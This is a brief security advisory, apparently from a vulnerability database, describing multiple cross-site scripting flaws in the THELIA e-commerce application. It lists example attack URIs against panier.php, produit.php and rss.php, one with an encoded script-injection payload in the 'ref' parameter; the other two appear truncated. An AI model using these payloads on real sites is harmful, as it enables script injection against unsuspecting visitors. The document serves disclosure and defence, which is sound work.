THELIA Multiple Cross Site Scripting Vulnerabilities

THELIA Multiple Cross Site Scripting Vulnerabilities

To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/panier.php?action=ajouter&ref=">
http://www.example.com/produit.php?ref=%22%3E%3Cscript%3Ealert%28/xss/.source%29;%3C/script%3E&id_rubrique=1
http://www.example.com/rss.php?ref=">&id_rubrique=